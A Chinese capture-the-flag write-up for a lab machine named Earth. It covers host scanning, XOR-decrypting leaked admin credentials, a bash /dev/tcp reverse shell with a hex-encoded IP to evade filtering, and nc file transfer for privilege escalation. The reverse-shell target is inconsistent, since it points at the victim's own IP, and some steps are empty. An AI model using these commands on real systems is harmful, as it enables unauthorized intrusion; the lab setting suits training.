信息收集:
1.Nmap存活扫描:
└─# nmap -sn 192.168.10.1/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 14:03 CST
Nmap scan report for 192.168.10.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.10.2
Host is up (0.00047s latency).
MAC Address: 00:50:56:E5:B1:08 (VMware)
Nmap scan report for 192.168.10.137 //靶机
Host is up (0.00033s latency).
MAC Address: 00:0C:29:24:27:1A (VMware)
Nmap scan report for 192.168.10.254
Host is up (0.0015s latency).
MAC Address: 00:50:56:E5:67:59 (VMware)
Nmap scan report for 192.168.10.135
Host is up.
2.端口扫描:
3.服务探测:
发现DNS解析,我们在 etc/hosts 里面添加一下:
vim /etc/hosts
192.168.10.137 earth.local
192.168.10.137 terratest.earth.local
4.nmap服务漏扫:
无漏洞信息
Web打点:
1.目录爆破:
发现登陆页面,但不存在SQL注入
扫另一个网站:
发现君子协议,robots.txt 访问查看内容。
发现文件,尝试访问,发现格式为 .txt
测试安全消息系统注意事项:
*使用XOR加密作为算法,应该像在RSA中使用的那样安全。
*地球已经确认他们收到了我们发送的信息。
*testdata.txt用于测试加密。
*terra用作管理门户的用户名。
Todo:
*我们如何安全地将每月的密钥发送到地球?还是我们应该每周更换钥匙?
*需要测试不同的密钥长度以防止暴力。钥匙应该有多长?
*需要改进消息传递界面和管理面板的界面,这是目前非常基本的。
这里给出了加密的提示XOR异或加密,应该是要我们解密首页给出的密文。
密钥是 https://terratest.earth.local/testdata.txt
密文只有第三个是密码。
账密:terra/earthclimatechangebad4humans
登录成功,发现命令执行页面:
2.shell:
直接反弹shell
bash -i >& /dev/tcp/192.168.10.137/2233 0>&1 //反弹失败,可能做了过滤
我们对ip地址进行16进制转换
0xc0.0xa8.0xa.0x87
bash -i >& /dev/tcp/0xc0.0xa8.0xa.0x87/2233 0>&1
3.提权
这里发现提权失败,把文件上传到kali,分析一下啥问题。
nc -lvnp 3344 > tmp
nc 192.168.10.135 3344 < /usr/bin/reset_root
strace 工具分析:
是靶机上缺少这三个文件夹导致的,创建文件夹再次启动:
提权成功!!
flag: